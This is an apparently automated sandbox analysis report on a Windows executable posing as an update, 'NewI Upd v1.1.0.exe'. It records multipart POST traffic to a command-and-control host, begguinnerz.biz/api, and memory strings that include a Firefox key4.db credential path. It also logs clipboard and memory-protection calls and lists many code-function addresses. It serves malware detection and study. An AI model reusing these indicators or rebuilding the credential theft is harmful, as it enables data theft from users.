                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6NPOTZ340UM1I91MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: begguinnerz.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0VJUNPD5A8U7ORRNJ62User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: begguinnerz.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SXIRRLO7FAIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1077Host: begguinnerz.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: begguinnerz.biz
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: begguinnerz.biz
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000195F000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microX
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/$
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179960747.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000198A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/4
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3157740815.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/D
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179960747.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000198A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/L
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059760478.0000000008899000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3080891177.00000000088A0000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3081146258.00000000088A0000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3080550430.000000000889D000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059691116.0000000008896000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3082316141.00000000088A4000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3080512137.0000000008896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/api
                  Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/apiz/
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/piT
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3157740815.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz/pil
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz:443/api
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz:443/apiOO
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz:443/apin.txtPK
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begguinnerz.biz:443/apis92o4p.default-release/key4.dbPK
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3059635151.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F1000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059726612.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059837353.00000000088EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3059635151.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F1000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059726612.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059837353.00000000088EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49883 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49889 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49895 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49902 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49907 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49914 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49920 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49926 version: TLS 1.2
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00433030 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_00433030
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00433030 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_00433030
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_008C01A8 NtAllocateVirtualMemory,0_2_008C01A8
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_008C06E8 NtProtectVirtualMemory,NtProtectVirtualMemory,0_2_008C06E8
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_006310100_2_00631010
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0063F1600_2_0063F160
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_006329200_2_00632920
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0063B1800_2_0063B180
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_006375000_2_00637500
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_006316D00_2_006316D0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_006387200_2_00638720
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_008A37E00_2_008A37E0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0063A7800_2_0063A780
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004388C00_2_004388C0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004239600_2_00423960
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0042D1990_2_0042D199
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004272200_2_00427220
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043BB400_2_0043BB40
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043F3400_2_0043F340
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004384A00_2_004384A0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043FCB00_2_0043FCB0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004087800_2_00408780
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0040E7AD0_2_0040E7AD
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043E8200_2_0043E820
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004180300_2_00418030
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004370E80_2_004370E8
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004099600_2_00409960
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0041C9600_2_0041C960
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043F9600_2_0043F960
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004269700_2_00426970
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0041F9000_2_0041F900
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004119300_2_00411930
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0041E1300_2_0041E130
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043E9C00_2_0043E9C0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004039E00_2_004039E0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0041D9E00_2_0041D9E0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004301EB0_2_004301EB
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004059F00_2_004059F0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004091F00_2_004091F0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004149F00_2_004149F0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004199810_2_00419981
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0042B1900_2_0042B190
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0040B1A00_2_0040B1A0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043C2700_2_0043C270
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004312000_2_00431200
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0041723C0_2_0041723C
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004392C00_2_004392C0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043EAD00_2_0043EAD0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004062E00_2_004062E0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043EAEB0_2_0043EAEB
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043EAE90_2_0043EAE9
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00425AFB0_2_00425AFB
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004192AB0_2_004192AB
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0041835F0_2_0041835F
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004223300_2_00422330
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004243CC0_2_004243CC
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004123D00_2_004123D0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00402BE00_2_00402BE0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0040F3E00_2_0040F3E0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00417BE80_2_00417BE8
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0040CBF20_2_0040CBF2
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00439B830_2_00439B83
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004043900_2_00404390
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043EC000_2_0043EC00
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0040D4100_2_0040D410
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00404CC00_2_00404CC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004094E00_2_004094E0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004164900_2_00416490
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043EC900_2_0043EC90
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004275400_2_00427540
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004075500_2_00407550
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00437D500_2_00437D50
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0040AD100_2_0040AD10
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0041DD100_2_0041DD10
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004275200_2_00427520
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043ED300_2_0043ED30
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0042D53A0_2_0042D53A
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00426D900_2_00426D90
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0040E5A20_2_0040E5A2
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00422DA80_2_00422DA8
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00415E7F0_2_00415E7F
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0043F6000_2_0043F600
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0042DE1E0_2_0042DE1E
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0042C6C10_2_0042C6C1
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00430EED0_2_00430EED
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0042DEA30_2_0042DEA3
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0041E7500_2_0041E750
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004067700_2_00406770
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_0042C70E0_2_0042C70E
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004227100_2_00422710
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004297230_2_00429723
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00419FC00_2_00419FC0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004237C90_2_004237C9
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00402F900_2_00402F90
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00423FA00_2_00423FA0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_004167AE0_2_004167AE
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: 0_2_00437FB00_2_00437FB0
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: String function: 00893170 appears 175 times
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: String function: 004149E0 appears 77 times
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: String function: 00408050 appears 41 times
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: String function: 00889080 appears 69 times
                  Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exeCode function: String function: 00889040 appears 57 times
